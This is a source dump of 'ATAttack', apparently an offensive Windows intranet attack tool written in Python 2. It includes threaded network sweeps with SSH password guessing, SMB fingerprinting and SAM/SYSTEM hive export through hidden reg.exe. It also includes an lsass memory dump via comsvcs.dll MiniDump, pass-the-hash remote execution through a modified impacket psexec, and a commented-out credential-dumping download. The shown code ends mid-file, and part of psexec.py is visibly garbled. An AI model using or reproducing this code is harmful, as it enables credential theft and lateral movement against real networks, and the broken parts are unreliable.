├── .DS_Store
├── .idea
├── ATAttack.iml
├── encodings.xml
├── misc.xml
├── modules.xml
├── vcs.xml
└── workspace.xml
├── ATAttack
├── __init__.py
├── __init__.pyc
├── credentials
│ ├── __init__.py
│ ├── check.py
│ ├── dump.py
│ ├── example.py
│ ├── psexec.py
│ └── yhzldb.py
├── enumeration
│ ├── __init__.py
│ ├── check.py
│ ├── connect.py
│ ├── host.py
│ ├── tasklist.py
│ └── upload.py
└── framework
│ ├── __init__.py
│ ├── addrspace.py
│ ├── constant.py
│ ├── newobj.py
│ ├── object.py
│ ├── prints.py
│ ├── types.py
│ └── win32
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── domcachedump.py
│ ├── hashdump.py
│ ├── hashdump.pyc
│ ├── lsasecrets.py
│ ├── rawreg.py
│ └── rawreg.pyc
├── README.md
├── doc
└── snapshot.jpg
├── exploit.exe
├── exploit.py
├── exploit.pyc
├── exploit.spec
├── http_client.py
├── http_server.py
├── requirements.txt
└── upx-3.95-win64
├── BUGS
├── COPYING
├── LICENSE
├── NEWS
├── README
├── README.1ST
├── THANKS
├── upx.1
├── upx.doc
├── upx.exe
└── upx.html
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/.DS_Store
--------------------------------------------------------------------------------
/.idea/ATAttack.iml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/ATAttack/__init__.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,os
# Make the repository root (one directory above this package) importable so
# the ATAttack.* modules resolve when a script is launched from inside the tree.
BASE_DIR = os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir, os.pardir))
sys.path.append(BASE_DIR)
7 |
--------------------------------------------------------------------------------
/ATAttack/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/__init__.pyc
--------------------------------------------------------------------------------
/ATAttack/credentials/__init__.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | import sys,os
# Put the repository root (two levels above this file) on sys.path so that the
# sibling ATAttack.* packages can be imported regardless of the working directory.
BASE_DIR = os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir, os.pardir))
sys.path.append(BASE_DIR)
7 |
--------------------------------------------------------------------------------
/ATAttack/credentials/check.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 |
5 | import socket
6 | import threading
7 | import struct
8 | import paramiko
9 | from functools import reduce
10 | from ATAttack.credentials.yhzldb import check_ip
11 | from ATAttack.credentials.example import psexec
12 | from ATAttack.framework.constant import constant
13 | from ATAttack.framework.prints import print_success
14 |
15 |
# Scanner-wide shared state: at most `threads_num` worker threads may run at
# once (bounded semaphore), `print_lock` serialises console output, and
# `version` collects the "ip:\\host OS:..." strings built by attak._check().
threads = 150
threads_num = int(threads)
semaphore = threading.BoundedSemaphore(threads_num)
print_lock = threading.Lock()
version = []
21 |
22 |
class ipadders():
    """IPv4 helpers: dotted-quad to integer, and an RFC 1918 private-range test."""

    def __init__(self):
        pass

    def ip_into_int(self, ip):
        """Return the 32-bit integer value of a dotted-quad address string.

        Example: 192.168.1.13 is c0.a8.01.0d in hex; dropping the dots gives
        3232235789, i.e. (((((192 * 256) + 168) * 256) + 1) * 256) + 13.
        Raises ValueError when an octet is not an integer.
        """
        value = 0
        for octet in ip.split('.'):
            value = (value << 8) + int(octet)
        return value

    def is_internal_ip(self, ip):
        """True when *ip* lies in 10.0.0.0/8, 172.16.0.0/12 or 192.168.0.0/16."""
        addr = self.ip_into_int(ip)
        # (shift, prefix): shifting away the host bits leaves only the network
        # part, which is then compared against the same prefix of the range.
        private_prefixes = (
            (24, self.ip_into_int('10.255.255.255') >> 24),
            (20, self.ip_into_int('172.31.255.255') >> 20),
            (16, self.ip_into_int('192.168.255.255') >> 16),
        )
        return any(addr >> shift == prefix for shift, prefix in private_prefixes)
39 |
class attak():
    """Per-host checks driven by smb_version(): SSH password guessing, NetBIOS
    and SMB fingerprinting, then check_ip() and psexec() on hosts that answered.

    NOTE(review): from a defender's view every address in the scanned range
    receives TCP/22, UDP/137 and TCP/445 connections, plus repeated SSH
    authentication failures for the user/password lists set in __init__.
    """

    def __init__(self):
        # SSH port/timeout and the credential lists tried by _creakssh().
        self.port = int(22)
        self.timeout = 5
        self.DIC_USER = ['root', 'oracle', ]
        self.DIC_PASSWD = ['root', 'oracle',]

    def _check(self,ip):
        """Fingerprint the SMB service on *ip* and append "ip:\\host OS:..." to
        constant.tmp_name__.

        Returns (ip, result) on success; any exception is swallowed and the
        method then returns None implicitly.
        """
        try:
            host_name, group_type = self._get_host_name(str(ip))
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            s.connect((ip, 445))
            # Two raw SMB1 requests (Negotiate Protocol, then Session Setup);
            # the OS string is parsed out of the reply to the second one.
            payload1 = b'\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00'
            payload2 = b'\x00\x00\x01\x0a\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x0c\xff\x00\x0a\x01\x04\x41\x32\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xcf\x00\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\xce\x0e\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x33\x00\x37\x00\x39\x00\x30\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x32\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x35\x00\x2e\x00\x32\x00\x00\x00\x00\x00'
            s.send(payload1)
            s.recv(1024)
            s.send(payload2)
            ret = s.recv(1024)
            s.close()
            # Little-endian 16-bit byte count at offset 43 tells where the
            # OS string starts (offset 47 + length).
            length = ord(ret[43:44]) + ord(ret[44:45]) * 256
            os_version = ret[47 + length:]
            result = ip + ":" + "\\\\" + host_name + " OS:" + os_version
            version.append(result)
            # Appends every entry of the module-level `version` list on each
            # call, so earlier hosts are written to the file again.
            for os in version:
                with open(constant.tmp_name__, "a") as file:
                    file.writelines(os + '\n')
                    file.close()  # redundant: the with-block closes the file
            return ip, result
        except Exception:
            pass

    def _get_host_name(self,ip):
        """Send a NetBIOS name-service (UDP/137) status query to *ip* and return
        (host_name, group_type).

        Both values are "" when the host does not answer within 2 s or the
        reply cannot be parsed (BaseException is caught, including timeouts).
        """
        host_name = ""
        group_type = ""
        host_name_type = ""
        # NBSTAT request for the wildcard name "*" (first-level encoded as "CK" + "A"*30).
        data = b'ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01'
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.settimeout(2)
            s.sendto(data, (ip, 137))
            recv = s.recv(2000)
            if isinstance(recv, str):
                recv = bytes(recv)
            # Byte 56 of the reply is the number of names; each entry that
            # follows is 18 bytes, the first 15 being the padded name.
            num = ord(recv[56:57].decode())
            recv = recv[57:]
            s.close()
            for i in range(num):
                name = recv[18 * i:18 * i + 15].decode()
                # Keep distinct names, "\"-separated: first is the host name,
                # second the workgroup/domain.
                if str(name).strip() not in host_name_type:
                    host_name_type = host_name_type + str(name).strip() + "\\"
            host_name = host_name_type.split('\\')[0]
            group_type = host_name_type.split('\\')[1]
            return host_name, group_type
        except BaseException:
            return host_name, group_type

    def ip2Int(self,network):
        """Convert "a.b.c.d/prefix" into the (start, end) integer bounds of
        the block containing that address.

        Raises ValueError on a missing "/" or a non-numeric prefix, and
        socket.error/OSError on a malformed address.
        """

        (ip, cidr) = network.split('/')
        cidr = int(cidr)
        host_bits = 32 - cidr
        i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness
        start = (i >> host_bits) << host_bits # clear the host bits
        end = i | ((1 << host_bits) - 1)   # set the host bits: last address
        return start,end

    def _thread(self,ip_address,dump):
        """Worker body for one address: SSH guessing, SMB fingerprint, then
        check_ip() and psexec('whoami', ...) using *dump* as the hash.

        Always releases the module-level semaphore acquired by smb_version().
        """
        global semaphore
        try:
            self._creakssh(ip_address)
            # _check() returns None when the host did not answer, so this
            # unpack raises and the remaining steps are skipped for that host.
            ipadder, result = self._check(ip_address)
            if ipadder is not None:
                check_ip(ipadder)
                psexec('whoami', ipadder, dump, None)
        except Exception:
            with print_lock:
                pass
        finally:
            semaphore.release()

    def smb_version(self,network,dump):
        """Run _thread() for every host of the CIDR block *network* (the first
        and last addresses are skipped), throttled by the module semaphore.

        *dump* is forwarded unchanged to psexec() — presumably the NT hash.
        """
        start,end = self.ip2Int(network)
        for i in range(start + 1, end):
            semaphore.acquire()
            t = threading.Thread(
                target=self._thread, args=(socket.inet_ntoa(struct.pack('>I', i)),dump))
            t.start()

    def _creakssh(self,host):
        """Probe SSH on *host*: an empty-credential connect first and, if the
        server replied with an authentication error, each DIC_USER/DIC_PASSWD
        pair. Hits are reported through print_success(); all errors are
        swallowed.

        NOTE(review): AutoAddPolicy accepts any host key, so the session is
        open to a man-in-the-middle; the inner `break` only leaves the
        password loop, so the next user is still tried after a hit.
        """
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(host, self.port, '', '',timeout=self.timeout)
            ssh.close()
        except Exception as e:
            if 'Authentication' in str(e):
                for user in self.DIC_USER:
                    for pwd in self.DIC_PASSWD:
                        try:
                            ssh.connect(host, self.port, user, pwd, timeout=3)
                            print_success(host + " ssh Weak account: {user}:{passwd}".format(user=user, passwd=pwd))
                            ssh.close()
                            break
                        except Exception as e:
                            pass
            ssh.close()
148 |
--------------------------------------------------------------------------------
/ATAttack/credentials/dump.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 |
4 | from ATAttack.framework.win32.hashdump import dump_file_hashes
5 | from ATAttack.framework.constant import constant
6 | import subprocess
7 | import os
8 | import wget
9 | import re
10 |
# Console-window flags used by samdump.save_hives() to hide the spawned
# cmd.exe window. `_subprocess` is presumably the private Python 2 extension
# module; newer interpreters expose the same names on `subprocess` itself.
# NOTE(review): only ImportError is caught — on a non-Windows interpreter
# `subprocess.STARTF_USESHOWWINDOW` does not exist, so importing this module
# raises AttributeError rather than falling back gracefully.
try:
    import _subprocess as sub
    STARTF_USESHOWWINDOW = sub.STARTF_USESHOWWINDOW
    SW_HIDE = sub.SW_HIDE
except ImportError:
    STARTF_USESHOWWINDOW = subprocess.STARTF_USESHOWWINDOW
    SW_HIDE = subprocess.SW_HIDE
18 |
class samdump:
    """Local credential extraction: export the SAM/SYSTEM hives with reg.exe
    and parse them, or write a memory dump of lsass.exe.

    NOTE(review): both paths leave well-known host artefacts — a hidden
    cmd.exe running `reg.exe save hklm\<hive> <tmpfile>`, and rundll32
    loading comsvcs.dll to MiniDump lsass.exe — which process-creation /
    command-line logging and LSASS access auditing can detect.
    """

    def __init__(self):
        pass

    def save_hives(self):
        """
        Save SAM Hives

        Exports every hive named in constant.hives to its temp path (skipping
        ones that already exist), parses them with dump_file_hashes() and
        returns the first element of its result. Any failure is swallowed and
        None is returned; the exported files are always removed afterwards.
        """
        sammhives = []
        try:
            for h in constant.hives:
                if not os.path.exists(constant.hives[h]):
                    cmdline = r'reg.exe save hklm\%s %s' % (
                        h, constant.hives[h])
                    command = ['cmd.exe', '/c', cmdline]
                    # Run the export without showing a console window.
                    info = subprocess.STARTUPINFO()
                    info.dwFlags = STARTF_USESHOWWINDOW
                    info.wShowWindow = SW_HIDE
                    p = subprocess.Popen(
                        command,
                        startupinfo=info,
                        stdin=subprocess.PIPE,
                        stderr=subprocess.STDOUT,
                        stdout=subprocess.PIPE,
                        universal_newlines=True)
                    results, _ = p.communicate()
                sammhives.append(constant.hives[h])
            # Assumes constant.hives iterates as (system, sam) — it is a plain
            # dict, so on Python 2 that order is not guaranteed; TODO confirm.
            ntlm = dump_file_hashes(sammhives[0], sammhives[1])
            # lsass_dump()
            return ntlm[0]
        except BaseException: # Catch all kind of exceptions
            pass
        finally:
            self.delete_hives()

    def delete_hives(self):
        """
        Delete SAM Hives
        """
        # Try to remove all temporary files
        for h in constant.hives:
            if os.path.exists(constant.hives[h]):
                try:
                    os.remove(constant.hives[h])
                except Exception:
                    pass

    def lsassdump(self):
        """Write a full memory dump of lsass.exe to constant.dump_name.

        The PID is the first number in the `tasklist /svc` line for lsass.exe;
        raises IndexError (regex[0]) when no such line exists. The dump is
        started through powershell -> rundll32 comsvcs.dll MiniDump and is not
        waited for.
        """

        tasklist = os.popen('tasklist /svc | findstr lsass.exe').read()
        regex = re.findall(r'\d+', tasklist, re.S)
        payload = r'powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump {} {} full"'.format(
            regex[0], constant.dump_name)
        os.popen(payload)
        # try:
        #     wget.download(url=constant.pyurl,out=constant.pyexe)
        #     payload1 = '{exe} "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit > {file}'.format(exe=constant.pyexe,file=constant.pyname)
        #     os.popen(payload1)
        #     print("lsass.exe process to Sucessfull")
        # except:
        #     pass
--------------------------------------------------------------------------------
/ATAttack/credentials/example.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python2.7
2 | # -*- coding: utf-8 -*-
3 |
4 | # import smbexec
5 | from psexec import PSEXEC
6 | # import multiprocessing
7 | from ATAttack.framework.constant import constant
8 |
9 |
10 | # def smbexec(command, target, ntlmhash):
11 | # try:
12 | # executer = smbexec.CMDEXEC(
13 | # "445/SMB",
14 | # username=constant.username,
15 | # domain='',
16 | # hashes=constant.lmhash.format(ntlmhash),
17 | # mode="SHARE",
18 | # share="C$",
19 | # serviceName=None)
20 | # exdb = executer.run(target, command)
21 | # return exdb
22 | # except Exception :
23 | # pass
24 |
def psexec(command,target, ntlmhash,File):
    """Run *command* on *target* through PSEXEC, authenticating as
    "administrator" with an empty LM hash and *ntlmhash* as the NT hash
    (constant.lmhash template), i.e. pass-the-hash.

    *File*, when not None, is copied to the target and prepended to the
    command (PSEXEC copyFile). Every exception is swallowed, so callers get
    no indication of success or failure.

    NOTE(review): on the target this appears as a service installed from
    the admin share followed by RemCom named-pipe traffic, with an NTLM
    network logon for "administrator".
    """
    try:
        objes = PSEXEC(
            command,
            "c:\\windows\\system32\\",
            exeFile=None,
            copyFile=File,
            username="administrator",
            hashes=constant.lmhash.format(ntlmhash))
        objes.run(target)
    except Exception :
        pass
37 |
--------------------------------------------------------------------------------
/ATAttack/credentials/psexec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # Copyright (c) 2003-2016 CORE Security Technologies
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 | # PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom)
9 | #
10 | # Author:
11 | # beto (@agsolino)
12 | #
13 | # Reference for:
14 | # DCE/RPC and SMB.
15 |
16 | import sys
17 | import os
18 | import cmd
19 | import logging
20 | from threading import Thread, Lock
21 | import argparse
22 | import random
23 | import string
24 | import time
25 |
26 | from impacket.examples import logger
27 | from impacket import version, smb
28 | from impacket.smbconnection import SMBConnection
29 | from impacket.dcerpc.v5 import transport
30 | from impacket.structure import Structure
31 | from impacket.examples import remcomsvc, serviceinstall
32 |
33 |
34 | class RemComMessage(Structure):
35 | structure = (
36 | ('Command','4096s=""'),
37 | ('WorkingDir','260s=""'),
38 | ('Priority',' 0:
105 | try:
106 | s.waitNamedPipe(tid,pipe)
107 | pipeReady = True
108 | except:
109 | tries -= 1
110 | time.sleep(2)
111 | pass
112 |
113 | if tries == 0:
114 | # logging.critical('Pipe not ready, aborting')
115 | pass
116 | raise
117 |
118 | fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)
119 |
120 | return fid
121 |
    def doStuff(self, rpctransport):
        """Execute self.__command on the host behind *rpctransport* via RemComSvc.

        Installs the service (bundled RemComSvc or the binary at
        self.__exeFile), optionally copies self.__copyFile to the share and
        prepends it to the command, sends the request over the
        RemCom_communicaton pipe and relays stdin/stdout/stderr on three
        per-process pipes until the remote process exits. Always ends with
        sys.exit(): the remote error code on success, 1 on any failure, after
        uninstalling the service and deleting the copied file. The enclosing
        PSEXEC class is defined outside this section.

        NOTE(review): where the upstream impacket example logged failures this
        copy has `pass`, so connection and file-open errors exit silently.
        """

        dce = rpctransport.get_dce_rpc()
        try:
            dce.connect()
        except Exception, e:
            pass
            sys.exit(1)
        # The pipe threads open their own sessions with the dialect negotiated here.
        global dialect
        dialect = rpctransport.get_smb_connection().getDialect()

        try:
            unInstalled = False
            s = rpctransport.get_smb_connection()

            # We don't wanna deal with timeouts from now on.
            s.setTimeout(100000)
            if self.__exeFile is None:
                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
            else:
                try:
                    f = open(self.__exeFile)
                except Exception, e:
                    pass
                    sys.exit(1)
                installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f)

            installService.install()

            if self.__exeFile is not None:
                f.close()

            # Check if we need to copy a file for execution
            if self.__copyFile is not None:
                installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile))
                # And we change the command to be executed to this filename
                self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command

            tid = s.connectTree('IPC$')
            fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f)

            packet = RemComMessage()
            pid = os.getpid()

            # A random 4-letter tag plus the local pid name this session's stdio pipes.
            packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)])
            if self.__path is not None:
                packet['WorkingDir'] = self.__path
            packet['Command'] = self.__command
            packet['ProcessID'] = pid

            s.writeNamedPipe(tid, fid_main, str(packet))

            # Here we'll store the command we type so we don't print it back ;)
            # ( I know.. globals are nasty :P )
            global LastDataSent
            LastDataSent = ''

            # Create the pipes threads
            stdin_pipe = RemoteStdInPipe(rpctransport,
                                         '\%s%s%d' % (RemComSTDIN, packet['Machine'], packet['ProcessID']),
                                         smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare())
            stdin_pipe.start()
            stdout_pipe = RemoteStdOutPipe(rpctransport,
                                           '\%s%s%d' % (RemComSTDOUT, packet['Machine'], packet['ProcessID']),
                                           smb.FILE_READ_DATA)
            stdout_pipe.start()
            stderr_pipe = RemoteStdErrPipe(rpctransport,
                                           '\%s%s%d' % (RemComSTDERR, packet['Machine'], packet['ProcessID']),
                                           smb.FILE_READ_DATA)
            stderr_pipe.start()

            # And we stay here till the end
            ans = s.readNamedPipe(tid,fid_main,8)

            if len(ans):
                retCode = RemComResponse(ans)
                # logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (
                # self.__command, retCode['ErrorCode'], retCode['ReturnCode']))
                installService.uninstall()
                if self.__copyFile is not None:
                    # We copied a file for execution, let's remove it
                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
                unInstalled = True
                sys.exit(retCode['ErrorCode'])

        except SystemExit:
            raise
        except:
            # Clean up whatever was installed/copied before bailing out.
            if unInstalled is False:
                installService.uninstall()
                if self.__copyFile is not None:
                    s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile))
            sys.stdout.flush()
            sys.exit(1)
216 |
class Pipes(Thread):
    """Daemon thread that owns a separate SMB session to one RemCom named pipe.

    connectPipe() logs in with the credentials of the main transport
    (Kerberos or password/hash), connects IPC$ and opens the pipe, storing
    the tree and file ids that subclasses read or write in run().
    """
    def __init__(self, transport, pipe, permissions, share=None):
        Thread.__init__(self)
        self.server = 0
        self.transport = transport
        self.credentials = transport.get_credentials()
        self.tid = 0
        self.fid = 0
        self.share = share
        self.port = transport.get_dport()
        self.pipe = pipe
        self.permissions = permissions
        self.daemon = True

    def connectPipe(self):
        """Open the second SMB session and the pipe; every error is dropped.

        NOTE(review): the module-level `lock` is acquired at the top of the
        try and released only after login; if the login raises, the bare
        except swallows it and the lock is never released, so the other pipe
        threads block in their own connectPipe().
        """
        try:
            lock.acquire()
            global dialect
            #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
            self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(),
                                        sess_port=self.port, preferredDialect=dialect)
            user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
            if self.transport.get_kerberos() is True:
                self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)
            else:
                self.server.login(user, passwd, domain, lm, nt)
            lock.release()
            self.tid = self.server.connectTree('IPC$')

            self.server.waitNamedPipe(self.tid, self.pipe)
            self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)
            self.server.setTimeout(1000000)
        except:
            pass
251 |
252 |
class RemoteStdOutPipe(Pipes):
    """Reads the remote process's stdout pipe and echoes it to local stdout,
    suppressing the line the user just typed (tracked in LastDataSent)."""
    def __init__(self, transport, pipe, permisssions):
        Pipes.__init__(self, transport, pipe, permisssions)

    def run(self):
        """Loop forever: read up to 1024 bytes and write them (cp437-decoded)
        to stdout unless they equal the last data sent; errors are ignored."""
        self.connectPipe()
        while True:
            try:
                ans = self.server.readFile(self.tid,self.fid, 0, 1024)
            except:
                pass
            else:
                try:
                    global LastDataSent
                    if ans != LastDataSent:
                        sys.stdout.write(ans.decode('cp437'))
                        sys.stdout.flush()
                    else:
                        # Don't echo what I sent, and clear it up
                        LastDataSent = ''
                    # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars,
                    # it will give false positives tho.. we should find a better way to handle this.
                    # NOTE(review): this compares the string itself with 10, not
                    # len(LastDataSent); under Python 2 a str always orders above an
                    # int, so the clear happens on every iteration.
                    if LastDataSent > 10:
                        LastDataSent = ''
                except:
                    pass
279 |
class RemoteStdErrPipe(Pipes):
    """Reads the remote process's stderr pipe and copies it to local stderr."""
    def __init__(self, transport, pipe, permisssions):
        Pipes.__init__(self, transport, pipe, permisssions)

    def run(self):
        """Loop forever reading 1024-byte chunks and writing them unchanged
        (str()) to stderr; all read and write errors are ignored."""
        self.connectPipe()
        while True:
            try:
                ans = self.server.readFile(self.tid,self.fid, 0, 1024)
            except:
                pass
            else:
                try:
                    sys.stderr.write(str(ans))
                    sys.stderr.flush()
                except:
                    pass
297 |
class RemoteShell(cmd.Cmd):
    """Interactive loop run by RemoteStdInPipe: each line typed locally is
    written to the remote process's stdin pipe, except the local commands
    help, shell (!), get, put and lcd handled here. get/put use a separate
    SMB session (transferClient) against *share*.

    The intro banner was changed from the upstream impacket example to an
    "Attempt to succeed in PTH attack" message.
    """
    def __init__(self, server, port, credentials, tid, fid, share, transport):
        cmd.Cmd.__init__(self, False)
        self.prompt = '\x08'
        self.server = server
        self.transferClient = None
        self.tid = tid
        self.fid = fid
        self.credentials = credentials
        self.share = share
        self.port = port
        self.transport = transport
        self.intro = "{} Attempt to succeed in PTH attack....".format(self.server.getRemoteHost())

    def connect_transferClient(self):
        """Open the file-transfer SMB session with the same credentials and
        dialect as the main connection (Kerberos when the transport uses it)."""
        #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT)
        self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,
                                            preferredDialect=dialect)
        user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
        if self.transport.get_kerberos() is True:
            self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey,
                                              kdcHost=self.transport.get_kdcHost(), TGT=TGT, TGS=TGS)
        else:
            self.transferClient.login(user, passwd, domain, lm, nt)

    def do_help(self, line):
        """Print the local command summary, then nudge the remote prompt."""
        print """
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)
get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir
! {cmd} - executes a local shell cmd
""" % (self.share, self.share)
        self.send_data('\r\n', False)

    def do_shell(self, s):
        """Run *s* in a LOCAL shell (the `!` prefix), then send CRLF remotely."""
        os.system(s)
        self.send_data('\r\n')

    def do_get(self, src_path):
        """Download *src_path* (relative to the share) into the current local
        directory under its base name; failures are silently ignored."""
        try:
            if self.transferClient is None:
                self.connect_transferClient()

            import ntpath
            filename = ntpath.basename(src_path)
            fh = open(filename,'wb')
            logging.info("Downloading %s\%s" % (self.share, src_path))
            self.transferClient.getFile(self.share, src_path, fh.write)
            fh.close()
        except Exception, e:
            pass

        self.send_data('\r\n')

    def do_put(self, s):
        """Upload a local file: "src [dst_dir]", dst_dir relative to the share
        (default "/"); "/" is rewritten to "\\". Failures are ignored."""
        try:
            if self.transferClient is None:
                self.connect_transferClient()
            params = s.split(' ')
            if len(params) > 1:
                src_path = params[0]
                dst_path = params[1]
            elif len(params) == 1:
                src_path = params[0]
                dst_path = '/'

            src_file = os.path.basename(src_path)
            fh = open(src_path, 'rb')
            f = dst_path + '/' + src_file
            pathname = string.replace(f,'/','\\')
            logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path))
            self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)
            fh.close()
        except Exception, e:
            pass

        self.send_data('\r\n')

    def do_lcd(self, s):
        """Change (or, with no argument, print) the LOCAL working directory."""
        if s == '':
            print os.getcwd()
        else:
            os.chdir(s)
        self.send_data('\r\n')

    def emptyline(self):
        """An empty line just sends CRLF so the remote prompt is redrawn."""
        self.send_data('\r\n')
        return

    def default(self, line):
        """Any other input goes to the remote stdin, re-encoded as cp437 + CRLF."""
        self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\r\n')

    def send_data(self, data, hideOutput = True):
        """Write *data* to the stdin pipe. With hideOutput the data is stored in
        the global LastDataSent so RemoteStdOutPipe does not echo it back."""
        if hideOutput is True:
            global LastDataSent
            LastDataSent = data
        else:
            LastDataSent = ''
        self.server.writeFile(self.tid, self.fid, data)
398 |
class RemoteStdInPipe(Pipes):
    """Owns the remote stdin pipe and runs the RemoteShell command loop on it."""
    def __init__(self, transport, pipe, permisssions, share=None):
        self.shell = None
        Pipes.__init__(self, transport, pipe, permisssions, share)

    def run(self):
        """Connect the pipe, then block in RemoteShell.cmdloop(); any
        exception ends the thread silently."""
        try:
            self.connectPipe()
            self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
            self.shell.cmdloop()
        except Exception:
            pass
411 |
412 | # Process command-line arguments.
if __name__ == '__main__':
    # Command-line entry point of the upstream impacket example: parse the
    # target spec and authentication options, then run PSEXEC against it.
    # Init the example's logger theme
    logger.init()
    print version.BANNER

    parser = argparse.ArgumentParser(add_help = True, description = "PSEXEC like functionality example using RemComSvc.")

    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
    parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)')
    parser.add_argument('-c', action='store',metavar = "pathname", help='copy the filename for later execution, arguments are passed in the command option')
